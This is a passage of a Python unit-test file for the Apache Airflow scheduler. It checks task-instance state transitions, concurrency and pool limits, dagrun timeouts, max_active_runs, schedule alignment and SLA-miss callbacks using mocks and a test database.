dr3 = scheduler.create_dag_run(dag)
ti1 = TI(task1, dr1.execution_date)
ti2 = TI(task1, dr2.execution_date)
ti3 = TI(task1, dr3.execution_date)
ti1.state = State.SCHEDULED
ti2.state = State.SCHEDULED
ti3.state = State.SCHEDULED
session.merge(ti1)
session.merge(ti2)
session.merge(ti3)
session.commit()
res = scheduler._change_state_for_executable_task_instances(
[ti1, ti2, ti3],
[State.RUNNING],
session)
self.assertEqual(0, len(res))
def test_change_state_for_executable_task_instances_none_state(self):
dag_id = 'SchedulerJobTest.test_change_state_for__none_state'
task_id_1 = 'dummy'
dag = DAG(dag_id=dag_id, start_date=DEFAULT_DATE, concurrency=2)
task1 = DummyOperator(dag=dag, task_id=task_id_1)
self._make_simple_dag_bag([dag])
scheduler = SchedulerJob()
session = settings.Session()
dr1 = scheduler.create_dag_run(dag)
dr2 = scheduler.create_dag_run(dag)
dr3 = scheduler.create_dag_run(dag)
ti1 = TI(task1, dr1.execution_date)
ti2 = TI(task1, dr2.execution_date)
ti3 = TI(task1, dr3.execution_date)
ti1.state = State.SCHEDULED
ti2.state = State.QUEUED
ti3.state = State.NONE
session.merge(ti1)
session.merge(ti2)
session.merge(ti3)
session.commit()
res = scheduler._change_state_for_executable_task_instances(
[ti1, ti2, ti3],
[State.NONE, State.SCHEDULED],
session)
self.assertEqual(2, len(res))
ti1.refresh_from_db()
ti3.refresh_from_db()
self.assertEqual(State.QUEUED, ti1.state)
self.assertEqual(State.QUEUED, ti3.state)
def test_enqueue_task_instances_with_queued_state(self):
dag_id = 'SchedulerJobTest.test_enqueue_task_instances_with_queued_state'
task_id_1 = 'dummy'
dag = DAG(dag_id=dag_id, start_date=DEFAULT_DATE)
task1 = DummyOperator(dag=dag, task_id=task_id_1)
dagbag = self._make_simple_dag_bag([dag])
scheduler = SchedulerJob()
session = settings.Session()
dr1 = scheduler.create_dag_run(dag)
ti1 = TI(task1, dr1.execution_date)
session.merge(ti1)
session.commit()
with patch.object(BaseExecutor, 'queue_command') as mock_queue_command:
scheduler._enqueue_task_instances_with_queued_state(dagbag, [ti1])
mock_queue_command.assert_called()
def test_execute_task_instances_nothing(self):
dag_id = 'SchedulerJobTest.test_execute_task_instances_nothing'
task_id_1 = 'dummy'
dag = DAG(dag_id=dag_id, start_date=DEFAULT_DATE, concurrency=2)
task1 = DummyOperator(dag=dag, task_id=task_id_1)
dagbag = SimpleDagBag([])
scheduler = SchedulerJob()
session = settings.Session()
dr1 = scheduler.create_dag_run(dag)
ti1 = TI(task1, dr1.execution_date)
ti1.state = State.SCHEDULED
session.merge(ti1)
session.commit()
self.assertEqual(0, scheduler._execute_task_instances(dagbag, states=[State.SCHEDULED]))
def test_execute_task_instances(self):
dag_id = 'SchedulerJobTest.test_execute_task_instances'
task_id_1 = 'dummy_task'
task_id_2 = 'dummy_task_nonexistent_queue'
# important that len(tasks) is less than concurrency
# because before scheduler._execute_task_instances would only
# check the num tasks once so if concurrency was 3,
# we could execute arbitrarily many tasks in the second run
dag = DAG(dag_id=dag_id, start_date=DEFAULT_DATE, concurrency=3)
task1 = DummyOperator(dag=dag, task_id=task_id_1)
task2 = DummyOperator(dag=dag, task_id=task_id_2)
dagbag = self._make_simple_dag_bag([dag])
scheduler = SchedulerJob()
session = settings.Session()
# create first dag run with 1 running and 1 queued
dr1 = scheduler.create_dag_run(dag)
ti1 = TI(task1, dr1.execution_date)
ti2 = TI(task2, dr1.execution_date)
ti1.refresh_from_db()
ti2.refresh_from_db()
ti1.state = State.RUNNING
ti2.state = State.RUNNING
session.merge(ti1)
session.merge(ti2)
session.commit()
self.assertEqual(State.RUNNING, dr1.state)
self.assertEqual(
2,
DAG.get_num_task_instances(
dag_id, dag.task_ids, states=[State.RUNNING], session=session
)
)
# create second dag run
dr2 = scheduler.create_dag_run(dag)
ti3 = TI(task1, dr2.execution_date)
ti4 = TI(task2, dr2.execution_date)
ti3.refresh_from_db()
ti4.refresh_from_db()
# manually set to scheduled so we can pick them up
ti3.state = State.SCHEDULED
ti4.state = State.SCHEDULED
session.merge(ti3)
session.merge(ti4)
session.commit()
self.assertEqual(State.RUNNING, dr2.state)
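# with dag concurrency of 3 and two TIs already RUNNING, only one of the two SCHEDULED TIs can be queued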
res = scheduler._execute_task_instances(dagbag, [State.SCHEDULED])
# check that concurrency is respected
ti1.refresh_from_db()
ti2.refresh_from_db()
ti3.refresh_from_db()
ti4.refresh_from_db()
self.assertEqual(
3,
DAG.get_num_task_instances(
dag_id, dag.task_ids, states=[State.RUNNING, State.QUEUED], session=session
)
)
self.assertEqual(State.RUNNING, ti1.state)
self.assertEqual(State.RUNNING, ti2.state)
six.assertCountEqual(self, [State.QUEUED, State.SCHEDULED], [ti3.state, ti4.state])
self.assertEqual(1, res)
def test_execute_task_instances_limit(self):
dag_id = 'SchedulerJobTest.test_execute_task_instances_limit'
task_id_1 = 'dummy_task'
task_id_2 = 'dummy_task_2'
# important that len(tasks) is less than concurrency
# because before scheduler._execute_task_instances would only
# check the num tasks once so if concurrency was 3,
# we could execute arbitrarily many tasks in the second run
dag = DAG(dag_id=dag_id, start_date=DEFAULT_DATE, concurrency=16)
task1 = DummyOperator(dag=dag, task_id=task_id_1)
task2 = DummyOperator(dag=dag, task_id=task_id_2)
dagbag = self._make_simple_dag_bag([dag])
scheduler = SchedulerJob()
scheduler.max_tis_per_query = 3
session = settings.Session()
tis = []
for i in range(0, 4):
dr = scheduler.create_dag_run(dag)
ti1 = TI(task1, dr.execution_date)
ti2 = TI(task2, dr.execution_date)
tis.append(ti1)
tis.append(ti2)
ti1.refresh_from_db()
ti2.refresh_from_db()
ti1.state = State.SCHEDULED
ti2.state = State.SCHEDULED
session.merge(ti1)
session.merge(ti2)
session.commit()
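# max_tis_per_query=3 forces the scheduler to batch its queries, but all 8 SCHEDULED TIs should still end up QUEUED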
res = scheduler._execute_task_instances(dagbag, [State.SCHEDULED])
self.assertEqual(8, res)
for ti in tis:
ti.refresh_from_db()
self.assertEqual(State.QUEUED, ti.state)
@unittest.skipUnless("INTEGRATION" in os.environ,
"The test is flaky with nondeterministic result")
def test_change_state_for_tis_without_dagrun(self):
dag1 = DAG(dag_id='test_change_state_for_tis_without_dagrun', start_date=DEFAULT_DATE)
DummyOperator(task_id='dummy', dag=dag1, owner='airflow')
DummyOperator(task_id='dummy_b', dag=dag1, owner='airflow')
dag2 = DAG(dag_id='test_change_state_for_tis_without_dagrun_dont_change', start_date=DEFAULT_DATE)
DummyOperator(task_id='dummy', dag=dag2, owner='airflow')
dag3 = DAG(dag_id='test_change_state_for_tis_without_dagrun_no_dagrun', start_date=DEFAULT_DATE)
DummyOperator(task_id='dummy', dag=dag3, owner='airflow')
session = settings.Session()
dr1 = dag1.create_dagrun(run_id=DagRun.ID_PREFIX,
state=State.RUNNING,
execution_date=DEFAULT_DATE,
start_date=DEFAULT_DATE,
session=session)
dr2 = dag2.create_dagrun(run_id=DagRun.ID_PREFIX,
state=State.RUNNING,
execution_date=DEFAULT_DATE,
start_date=DEFAULT_DATE,
session=session)
ti1a = dr1.get_task_instance(task_id='dummy', session=session)
ti1a.state = State.SCHEDULED
ti1b = dr1.get_task_instance(task_id='dummy_b', session=session)
ti1b.state = State.SUCCESS
session.commit()
ti2 = dr2.get_task_instance(task_id='dummy', session=session)
ti2.state = State.SCHEDULED
session.commit()
ti3 = TI(dag3.get_task('dummy'), DEFAULT_DATE)
ti3.state = State.SCHEDULED
session.merge(ti3)
session.commit()
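# ti3 belongs to dag3, which never had a dagrun created, so it is the only TI expected to be reset to NONE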
dagbag = self._make_simple_dag_bag([dag1, dag2, dag3])
scheduler = SchedulerJob(num_runs=0, run_duration=0)
scheduler._change_state_for_tis_without_dagrun(
simple_dag_bag=dagbag,
old_states=[State.SCHEDULED, State.QUEUED],
new_state=State.NONE,
session=session)
ti1a = dr1.get_task_instance(task_id='dummy', session=session)
ti1a.refresh_from_db(session=session)
self.assertEqual(ti1a.state, State.SCHEDULED)
ti1b = dr1.get_task_instance(task_id='dummy_b', session=session)
ti1b.refresh_from_db(session=session)
self.assertEqual(ti1b.state, State.SUCCESS)
ti2 = dr2.get_task_instance(task_id='dummy', session=session)
ti2.refresh_from_db(session=session)
self.assertEqual(ti2.state, State.SCHEDULED)
ti3.refresh_from_db(session=session)
self.assertEquals(ti3.state, State.NONE)
dr1.refresh_from_db(session=session)
dr1.state = State.FAILED
# persist the failed dagrun state before re-running the state change
session.merge(dr1)
session.commit()
scheduler._change_state_for_tis_without_dagrun(
simple_dag_bag=dagbag,
old_states=[State.SCHEDULED, State.QUEUED],
new_state=State.NONE,
session=session)
ti1a.refresh_from_db(session=session)
self.assertEqual(ti1a.state, State.SCHEDULED)
# don't touch ti1b
ti1b.refresh_from_db(session=session)
self.assertEqual(ti1b.state, State.SUCCESS)
# don't touch ti2
ti2.refresh_from_db(session=session)
self.assertEqual(ti2.state, State.SCHEDULED)
def test_change_state_for_tasks_failed_to_execute(self):
dag = DAG(
dag_id='dag_id',
start_date=DEFAULT_DATE)
task = DummyOperator(
task_id='task_id',
dag=dag,
owner='airflow')
# If there's no left over task in executor.queued_tasks, nothing happens
session = settings.Session()
scheduler_job = SchedulerJob()
mock_logger = mock.MagicMock()
test_executor = TestExecutor()
scheduler_job.executor = test_executor
scheduler_job._logger = mock_logger
scheduler_job._change_state_for_tasks_failed_to_execute()
mock_logger.info.assert_not_called()
# Tasks failed to execute with QUEUED state will be set to SCHEDULED state.
session.query(TI).delete()
session.commit()
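# simulate a QUEUED task left behind in executor.queued_tasks; it should be moved back to SCHEDULED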
key = 'dag_id', 'task_id', DEFAULT_DATE, 1
test_executor.queued_tasks[key] = 'value'
ti = TI(task, DEFAULT_DATE)
ti.state = State.QUEUED
session.merge(ti)
session.commit()
scheduler_job._change_state_for_tasks_failed_to_execute()
ti.refresh_from_db()
self.assertEquals(State.SCHEDULED, ti.state)
# Tasks failed to execute with RUNNING state will not be set to SCHEDULED state.
session.query(TI).delete()
session.commit()
ti.state = State.RUNNING
session.merge(ti)
session.commit()
scheduler_job._change_state_for_tasks_failed_to_execute()
ti.refresh_from_db()
self.assertEquals(State.RUNNING, ti.state)
def test_execute_helper_reset_orphaned_tasks(self):
session = settings.Session()
dag = DAG(
'test_execute_helper_reset_orphaned_tasks',
start_date=DEFAULT_DATE,
default_args={'owner': 'owner1'})
with dag:
op1 = DummyOperator(task_id='op1')
dag.clear()
dr = dag.create_dagrun(run_id=DagRun.ID_PREFIX,
state=State.RUNNING,
execution_date=DEFAULT_DATE,
start_date=DEFAULT_DATE,
session=session)
dr2 = dag.create_dagrun(run_id=BackfillJob.ID_PREFIX,
state=State.RUNNING,
execution_date=DEFAULT_DATE + datetime.timedelta(1),
start_date=DEFAULT_DATE,
session=session)
ti = dr.get_task_instance(task_id=op1.task_id, session=session)
ti.state = State.SCHEDULED
ti2 = dr2.get_task_instance(task_id=op1.task_id, session=session)
ti2.state = State.SCHEDULED
session.commit()
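# the scheduler-created run's orphaned SCHEDULED task should be reset to NONE, while the backfill run's task is left alone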
processor = mock.MagicMock()
scheduler = SchedulerJob(num_runs=0, run_duration=0)
executor = TestExecutor()
scheduler.executor = executor
scheduler.processor_agent = processor
scheduler._execute_helper()
ti = dr.get_task_instance(task_id=op1.task_id, session=session)
self.assertEqual(ti.state, State.NONE)
ti2 = dr2.get_task_instance(task_id=op1.task_id, session=session)
self.assertEqual(ti2.state, State.SCHEDULED)
@provide_session
def evaluate_dagrun(
self,
dag_id,
expected_task_states, # dict of task_id: state
dagrun_state,
run_kwargs=None,
advance_execution_date=False,
session=None):
"""
Helper for testing DagRun states with simple two-task DAGs.
This is hackish: a dag run is created but its tasks are
run by a backfill.
"""
if run_kwargs is None:
run_kwargs = {}
scheduler = SchedulerJob()
dag = self.dagbag.get_dag(dag_id)
dag.clear()
dr = scheduler.create_dag_run(dag)
if advance_execution_date:
# run a second time to schedule a dagrun after the start_date
dr = scheduler.create_dag_run(dag)
ex_date = dr.execution_date
try:
dag.run(start_date=ex_date, end_date=ex_date, **run_kwargs)
except AirflowException:
pass
# test tasks
for task_id, expected_state in expected_task_states.items():
task = dag.get_task(task_id)
ti = TI(task, ex_date)
ti.refresh_from_db()
self.assertEqual(ti.state, expected_state)
# load dagrun
dr = DagRun.find(dag_id=dag_id, execution_date=ex_date)
dr = dr[0]
dr.dag = dag
self.assertEqual(dr.state, dagrun_state)
def test_dagrun_fail(self):
"""
DagRuns with one failed and one incomplete root task -> FAILED
"""
self.evaluate_dagrun(
dag_id='test_dagrun_states_fail',
expected_task_states={
'test_dagrun_fail': State.FAILED,
'test_dagrun_succeed': State.UPSTREAM_FAILED,
},
dagrun_state=State.FAILED)
def test_dagrun_success(self):
"""
DagRuns with one failed and one successful root task -> SUCCESS
"""
self.evaluate_dagrun(
dag_id='test_dagrun_states_success',
expected_task_states={
'test_dagrun_fail': State.FAILED,
'test_dagrun_succeed': State.SUCCESS,
},
dagrun_state=State.SUCCESS)
def test_dagrun_root_fail(self):
"""
DagRuns with one successful and one failed root task -> FAILED
"""
self.evaluate_dagrun(
dag_id='test_dagrun_states_root_fail',
expected_task_states={
'test_dagrun_succeed': State.SUCCESS,
'test_dagrun_fail': State.FAILED,
},
dagrun_state=State.FAILED)
def test_dagrun_root_fail_unfinished(self):
"""
DagRuns with one unfinished and one failed root task -> RUNNING
"""
# Run both the failed and successful tasks
scheduler = SchedulerJob()
dag_id = 'test_dagrun_states_root_fail_unfinished'
dag = self.dagbag.get_dag(dag_id)
dag.clear()
dr = scheduler.create_dag_run(dag)
try:
dag.run(start_date=dr.execution_date, end_date=dr.execution_date)
except AirflowException: # Expect an exception since there is a failed task
pass
# Mark the successful task as never having run since we want to see if the
# dagrun will be in a running state despite having an unfinished task.
with create_session() as session:
ti = dr.get_task_instance('test_dagrun_unfinished', session=session)
ti.state = State.NONE
session.commit()
dr_state = dr.update_state()
self.assertEqual(dr_state, State.RUNNING)
def test_dagrun_deadlock_ignore_depends_on_past_advance_ex_date(self):
"""
DagRun is marked a success if ignore_first_depends_on_past=True
Test that an otherwise-deadlocked dagrun is marked as a success
if ignore_first_depends_on_past=True and the dagrun execution_date
is after the start_date.
"""
self.evaluate_dagrun(
dag_id='test_dagrun_states_deadlock',
expected_task_states={
'test_depends_on_past': State.SUCCESS,
'test_depends_on_past_2': State.SUCCESS,
},
dagrun_state=State.SUCCESS,
advance_execution_date=True,
run_kwargs=dict(ignore_first_depends_on_past=True))
def test_dagrun_deadlock_ignore_depends_on_past(self):
"""
Test that ignore_first_depends_on_past doesn't affect results
(this is the same test as
test_dagrun_deadlock_ignore_depends_on_past_advance_ex_date except
that start_date == execution_date so depends_on_past is irrelevant).
"""
self.evaluate_dagrun(
dag_id='test_dagrun_states_deadlock',
expected_task_states={
'test_depends_on_past': State.SUCCESS,
'test_depends_on_past_2': State.SUCCESS,
},
dagrun_state=State.SUCCESS,
run_kwargs=dict(ignore_first_depends_on_past=True))
def test_scheduler_start_date(self):
"""
Test that the scheduler respects start_dates, even when DAGs have run
"""
with create_session() as session:
dag_id = 'test_start_date_scheduling'
dag = self.dagbag.get_dag(dag_id)
dag.clear()
self.assertTrue(dag.start_date > datetime.datetime.utcnow())
scheduler = SchedulerJob(dag_id,
num_runs=2)
scheduler.run()
# zero tasks ran
self.assertEqual(
len(session.query(TI).filter(TI.dag_id == dag_id).all()), 0)
session.commit()
# previously, running this backfill would kick off the Scheduler
# because it would take the most recent run and start from there.
# That behavior still exists, but now it will only do so if the run is
# after the start date
backfill = BackfillJob(
dag=dag,
start_date=DEFAULT_DATE,
end_date=DEFAULT_DATE)
backfill.run()
# one task ran
self.assertEqual(
len(session.query(TI).filter(TI.dag_id == dag_id).all()), 1)
session.commit()
scheduler = SchedulerJob(dag_id,
num_runs=2)
scheduler.run()
# still one task
self.assertEqual(
len(session.query(TI).filter(TI.dag_id == dag_id).all()), 1)
session.commit()
def test_scheduler_task_start_date(self):
"""
Test that the scheduler respects task start dates that are different
from DAG start dates
"""
dag_id = 'test_task_start_date_scheduling'
dag = self.dagbag.get_dag(dag_id)
dag.clear()
scheduler = SchedulerJob(dag_id,
num_runs=2)
scheduler.run()
session = settings.Session()
tiq = session.query(TI).filter(TI.dag_id == dag_id)
ti1s = tiq.filter(TI.task_id == 'dummy1').all()
ti2s = tiq.filter(TI.task_id == 'dummy2').all()
self.assertEqual(len(ti1s), 0)
self.assertEqual(len(ti2s), 2)
for t in ti2s:
self.assertEqual(t.state, State.SUCCESS)
def test_scheduler_multiprocessing(self):
"""
Test that the scheduler can successfully queue multiple dags in parallel
"""
dag_ids = ['test_start_date_scheduling', 'test_dagrun_states_success']
for dag_id in dag_ids:
dag = self.dagbag.get_dag(dag_id)
dag.clear()
scheduler = SchedulerJob(dag_ids=dag_ids,
num_runs=2)
scheduler.run()
# zero tasks ran
dag_id = 'test_start_date_scheduling'
session = settings.Session()
self.assertEqual(
len(session.query(TI).filter(TI.dag_id == dag_id).all()), 0)
def test_scheduler_dagrun_once(self):
"""
Test if the scheduler does not create multiple dagruns
if a dag is scheduled with @once and a start_date
"""
dag = DAG(
'test_scheduler_dagrun_once',
start_date=timezone.datetime(2015, 1, 1),
schedule_interval="@once")
scheduler = SchedulerJob()
dag.clear()
dr = scheduler.create_dag_run(dag)
self.assertIsNotNone(dr)
dr = scheduler.create_dag_run(dag)
self.assertIsNone(dr)
def test_scheduler_process_task_instances(self):
"""
Test if _process_task_instances puts the right task instances into the
queue.
"""
dag = DAG(
dag_id='test_scheduler_process_execute_task',
start_date=DEFAULT_DATE)
dag_task1 = DummyOperator(
task_id='dummy',
dag=dag,
owner='airflow')
session = settings.Session()
orm_dag = DagModel(dag_id=dag.dag_id)
session.merge(orm_dag)
session.commit()
session.close()
scheduler = SchedulerJob()
dag.clear()
dr = scheduler.create_dag_run(dag)
self.assertIsNotNone(dr)
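# the single task of the freshly created dagrun should be appended to the queue with its try number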
queue = Mock()
scheduler._process_task_instances(dag, queue=queue)
queue.append.assert_called_with(
(dag.dag_id, dag_task1.task_id, DEFAULT_DATE, TRY_NUMBER)
)
def test_scheduler_do_not_schedule_removed_task(self):
dag = DAG(
dag_id='test_scheduler_do_not_schedule_removed_task',
start_date=DEFAULT_DATE)
DummyOperator(
task_id='dummy',
dag=dag,
owner='airflow')
session = settings.Session()
orm_dag = DagModel(dag_id=dag.dag_id)
session.merge(orm_dag)
session.commit()
session.close()
scheduler = SchedulerJob()
dag.clear()
dr = scheduler.create_dag_run(dag)
self.assertIsNotNone(dr)
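# redefine the DAG without the task so the existing task instance no longer has a matching task and should not be scheduled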
dag = DAG(
dag_id='test_scheduler_do_not_schedule_removed_task',
start_date=DEFAULT_DATE)
queue = Mock()
scheduler._process_task_instances(dag, queue=queue)
queue.put.assert_not_called()
def test_scheduler_do_not_schedule_too_early(self):
dag = DAG(
dag_id='test_scheduler_do_not_schedule_too_early',
start_date=timezone.datetime(2200, 1, 1))
DummyOperator(
task_id='dummy',
dag=dag,
owner='airflow')
session = settings.Session()
orm_dag = DagModel(dag_id=dag.dag_id)
session.merge(orm_dag)
session.commit()
session.close()
scheduler = SchedulerJob()
dag.clear()
dr = scheduler.create_dag_run(dag)
self.assertIsNone(dr)
queue = Mock()
scheduler._process_task_instances(dag, queue=queue)
queue.put.assert_not_called()
def test_scheduler_do_not_run_finished(self):
dag = DAG(
dag_id='test_scheduler_do_not_run_finished',
start_date=DEFAULT_DATE)
DummyOperator(
task_id='dummy',
dag=dag,
owner='airflow')
session = settings.Session()
orm_dag = DagModel(dag_id=dag.dag_id)
session.merge(orm_dag)
session.commit()
scheduler = SchedulerJob()
dag.clear()
dr = scheduler.create_dag_run(dag)
self.assertIsNotNone(dr)
tis = dr.get_task_instances(session=session)
for ti in tis:
ti.state = State.SUCCESS
session.commit()
session.close()
queue = Mock()
scheduler._process_task_instances(dag, queue=queue)
queue.put.assert_not_called()
def test_scheduler_add_new_task(self):
"""
Test if a task instance will be added if the dag is updated
"""
dag = DAG(
dag_id='test_scheduler_add_new_task',
start_date=DEFAULT_DATE)
DummyOperator(
task_id='dummy',
dag=dag,
owner='airflow')
session = settings.Session()
orm_dag = DagModel(dag_id=dag.dag_id)
session.merge(orm_dag)
session.commit()
session.close()
scheduler = SchedulerJob()
dag.clear()
dr = scheduler.create_dag_run(dag)
self.assertIsNotNone(dr)
tis = dr.get_task_instances()
self.assertEquals(len(tis), 1)
DummyOperator(
task_id='dummy2',
dag=dag,
owner='airflow')
queue = Mock()
scheduler._process_task_instances(dag, queue=queue)
tis = dr.get_task_instances()
self.assertEquals(len(tis), 2)
def test_scheduler_verify_max_active_runs(self):
"""
Test that a dagrun will not be scheduled if max_active_runs has been reached
"""
dag = DAG(
dag_id='test_scheduler_verify_max_active_runs',
start_date=DEFAULT_DATE)
dag.max_active_runs = 1
DummyOperator(
task_id='dummy',
dag=dag,
owner='airflow')
session = settings.Session()
orm_dag = DagModel(dag_id=dag.dag_id)
session.merge(orm_dag)
session.commit()
session.close()
scheduler = SchedulerJob()
dag.clear()
dr = scheduler.create_dag_run(dag)
self.assertIsNotNone(dr)
dr = scheduler.create_dag_run(dag)
self.assertIsNone(dr)
def test_scheduler_fail_dagrun_timeout(self):
"""
Test that a dagrun will be set to failed if it exceeds dagrun_timeout
"""
dag = DAG(
dag_id='test_scheduler_fail_dagrun_timeout',
start_date=DEFAULT_DATE)
dag.dagrun_timeout = datetime.timedelta(seconds=60)
DummyOperator(
task_id='dummy',
dag=dag,
owner='airflow')
session = settings.Session()
orm_dag = DagModel(dag_id=dag.dag_id)
session.merge(orm_dag)
session.commit()
scheduler = SchedulerJob()
dag.clear()
dr = scheduler.create_dag_run(dag)
self.assertIsNotNone(dr)
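# backdate the dagrun's start_date so it exceeds the 60 second dagrun_timeout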
dr.start_date = timezone.utcnow() - datetime.timedelta(days=1)
session.merge(dr)
session.commit()
dr2 = scheduler.create_dag_run(dag)
self.assertIsNotNone(dr2)
dr.refresh_from_db(session=session)
self.assertEquals(dr.state, State.FAILED)
def test_scheduler_verify_max_active_runs_and_dagrun_timeout(self):
"""
Test that a dagrun will not be scheduled if max_active_runs
has been reached and dagrun_timeout has not been reached.
Test that a dagrun will be scheduled if max_active_runs has
been reached but dagrun_timeout has also been reached
"""
dag = DAG(
dag_id='test_scheduler_verify_max_active_runs_and_dagrun_timeout',
start_date=DEFAULT_DATE)
dag.max_active_runs = 1
dag.dagrun_timeout = datetime.timedelta(seconds=60)
DummyOperator(
task_id='dummy',
dag=dag,
owner='airflow')
session = settings.Session()
orm_dag = DagModel(dag_id=dag.dag_id)
session.merge(orm_dag)
session.commit()
session.close()
scheduler = SchedulerJob()
dag.clear()
dr = scheduler.create_dag_run(dag)
self.assertIsNotNone(dr)
# Should not be scheduled as the DagRun has not timed out and max_active_runs is reached
new_dr = scheduler.create_dag_run(dag)
self.assertIsNone(new_dr)
# Should be scheduled as dagrun_timeout has passed
dr.start_date = timezone.utcnow() - datetime.timedelta(days=1)
session.merge(dr)
session.commit()
new_dr = scheduler.create_dag_run(dag)
self.assertIsNotNone(new_dr)
def test_scheduler_max_active_runs_respected_after_clear(self):
"""
Test if _process_task_instances only schedules ti's up to max_active_runs
(related to issue AIRFLOW-137)
"""
dag = DAG(
dag_id='test_scheduler_max_active_runs_respected_after_clear',
start_date=DEFAULT_DATE)
dag.max_active_runs = 3
dag_task1 = DummyOperator(
task_id='dummy',
dag=dag,
owner='airflow')
session = settings.Session()
orm_dag = DagModel(dag_id=dag.dag_id)
session.merge(orm_dag)
session.commit()
session.close()
scheduler = SchedulerJob()
dag.clear()
# First create up to 3 dagruns in RUNNING state.
scheduler.create_dag_run(dag)
# Reduce max_active_runs to 1
dag.max_active_runs = 1
queue = Mock()
# and schedule them in, so we can check how many
# tasks are put on the queue (should be one, not 3)
scheduler._process_task_instances(dag, queue=queue)
queue.append.assert_called_with(
(dag.dag_id, dag_task1.task_id, DEFAULT_DATE, TRY_NUMBER)
)
@patch.object(TI, 'pool_full')
def test_scheduler_verify_pool_full(self, mock_pool_full):
"""
Test that task instances are not queued when the pool is full
"""
mock_pool_full.return_value = False
dag = DAG(
dag_id='test_scheduler_verify_pool_full',
start_date=DEFAULT_DATE)
DummyOperator(
task_id='dummy',
dag=dag,
owner='airflow',
pool='test_scheduler_verify_pool_full')
session = settings.Session()
pool = Pool(pool='test_scheduler_verify_pool_full', slots=1)
session.add(pool)
orm_dag = DagModel(dag_id=dag.dag_id)
orm_dag.is_paused = False
session.merge(orm_dag)
session.commit()
scheduler = SchedulerJob()
dag.clear()
# Create 2 dagruns, which will create 2 task instances.
dr = scheduler.create_dag_run(dag)
self.assertIsNotNone(dr)
self.assertEquals(dr.execution_date, DEFAULT_DATE)
dr = scheduler.create_dag_run(dag)
self.assertIsNotNone(dr)
queue = []
scheduler._process_task_instances(dag, queue=queue)
self.assertEquals(len(queue), 2)
dagbag = self._make_simple_dag_bag([dag])
# Re-create part of the scheduler loop here to kick the tasks off to the executor
for ti_key in queue:
task = dag.get_task(ti_key[1])
ti = TI(task, ti_key[2])
# Task starts out in the scheduled state. All tasks in the
# scheduled state will be sent to the executor
ti.state = State.SCHEDULED
# Also save this task instance to the DB.
session.merge(ti)
session.commit()
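# the pool has a single slot, so only one of the two SCHEDULED TIs should make it into the executor's queue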
scheduler._execute_task_instances(dagbag,
(State.SCHEDULED,
State.UP_FOR_RETRY))
self.assertEquals(len(scheduler.executor.queued_tasks), 1)
def test_scheduler_auto_align(self):
"""
Test if the schedule_interval will be auto aligned with the start_date
such that if the start_date coincides with the schedule the first
execution_date will be start_date, otherwise it will be start_date +
interval.
"""
dag = DAG(
dag_id='test_scheduler_auto_align_1',
start_date=timezone.datetime(2016, 1, 1, 10, 10, 0),
schedule_interval="4 5 * * *"
)
DummyOperator(
task_id='dummy',
dag=dag,
owner='airflow')
session = settings.Session()
orm_dag = DagModel(dag_id=dag.dag_id)
session.merge(orm_dag)
session.commit()
scheduler = SchedulerJob()
dag.clear()
dr = scheduler.create_dag_run(dag)
self.assertIsNotNone(dr)
self.assertEquals(dr.execution_date, timezone.datetime(2016, 1, 2, 5, 4))
dag = DAG(
dag_id='test_scheduler_auto_align_2',
start_date=timezone.datetime(2016, 1, 1, 10, 10, 0),
schedule_interval="10 10 * * *"
)
DummyOperator(
task_id='dummy',
dag=dag,
owner='airflow')
session = settings.Session()
orm_dag = DagModel(dag_id=dag.dag_id)
session.merge(orm_dag)
session.commit()
scheduler = SchedulerJob()
dag.clear()
dr = scheduler.create_dag_run(dag)
self.assertIsNotNone(dr)
self.assertEquals(dr.execution_date, timezone.datetime(2016, 1, 1, 10, 10))
def test_scheduler_reschedule(self):
"""
Checks if tasks that are not taken up by the executor
get rescheduled
"""
executor = TestExecutor()
dagbag = DagBag(executor=executor)
dagbag.dags.clear()
dagbag.executor = executor
dag = DAG(
dag_id='test_scheduler_reschedule',
start_date=DEFAULT_DATE)
DummyOperator(
task_id='dummy',
dag=dag,
owner='airflow')
dag.clear()
dag.is_subdag = False
session = settings.Session()
orm_dag = DagModel(dag_id=dag.dag_id)
orm_dag.is_paused = False
session.merge(orm_dag)
session.commit()
dagbag.bag_dag(dag=dag, root_dag=dag, parent_dag=dag)
@mock.patch('airflow.orm.DagBag', return_value=dagbag)
@mock.patch('airflow.orm.DagBag.collect_dags')
def do_schedule(function, function2):
# Use an empty file since the above mock will return the
# expected DAGs. Also specify only a single file so that it doesn't
# try to schedule the above DAG repeatedly.
scheduler = SchedulerJob(num_runs=1,
executor=executor,
subdir=os.path.join(settings.DAGS_FOLDER,
"no_dags.py"))
scheduler.heartrate = 0
scheduler.run()
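# first pass queues the task; clearing queued_tasks below simulates the executor never running it, so the next pass should queue again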
do_schedule()
self.assertEquals(1, len(executor.queued_tasks))
executor.queued_tasks.clear()
do_schedule()
self.assertEquals(2, len(executor.queued_tasks))
def test_scheduler_sla_miss_callback(self):
"""
Test that the scheduler does not call the sla_miss_callback when a notification has already been sent
"""
session = settings.Session()
# Mock the callback function so we can verify that it was not called
sla_callback = MagicMock()
# Create a dag with a start date of 2 days ago and an sla of 1 day,
# so an sla_miss is already on the books
test_start_date = days_ago(2)
dag = DAG(dag_id='test_sla_miss',
sla_miss_callback=sla_callback,
default_args={'start_date': test_start_date,
'sla': datetime.timedelta(days=1)})
task = DummyOperator(task_id='dummy',
dag=dag,
owner='airflow')
# Create a TaskInstance for two days ago
session.merge(models.TaskInstance(task=task,
execution_date=test_start_date,
state='success'))
# Create an SlaMiss where notification was sent, but email was not
session.merge(models.SlaMiss(task_id='dummy',
dag_id='test_sla_miss',
execution_date=test_start_date,
email_sent=False,
notification_sent=True))
# Now call manage_slas and see if the sla_miss callback gets called
scheduler = SchedulerJob(dag_id='test_sla_miss',
num_runs=1)
scheduler.manage_slas(dag=dag, session=session)
sla_callback.assert_not_called()
def test_scheduler_sla_miss_callback_exception(self):
"""
Test that the scheduler gracefully logs an exception if there is a problem
calling the sla_miss_callback
"""
session = settings.Session()
sla_callback = MagicMock(side_effect=RuntimeError('Could not call function'))
test_start_date = days_ago(2)
dag = DAG(dag_id='test_sla_miss',
sla_miss_callback=sla_callback,
default_args={'start_date': test_start_date})
task = DummyOperator(task_id='dummy',
dag=dag,
owner='airflow',
sla=datetime.timedelta(hours=1))
session.merge(models.TaskInstance(task=task,
execution_date=test_start_date,
state='Success'))
# Create an SlaMiss record for this task and execution date
session.merge(models.SlaMiss(task_id='dummy',
dag_id='test_sla_miss',
execution_date=test_start_date))
# Now call manage_slas and see if the sla_miss callback gets called
scheduler = SchedulerJob(dag_id='test_sla_miss')
with mock.patch('airflow.jobs.SchedulerJob.log',
new_callable=PropertyMock) as mock_log:
scheduler.manage_slas(dag=dag, session=session)
sla_callback.assert_called()
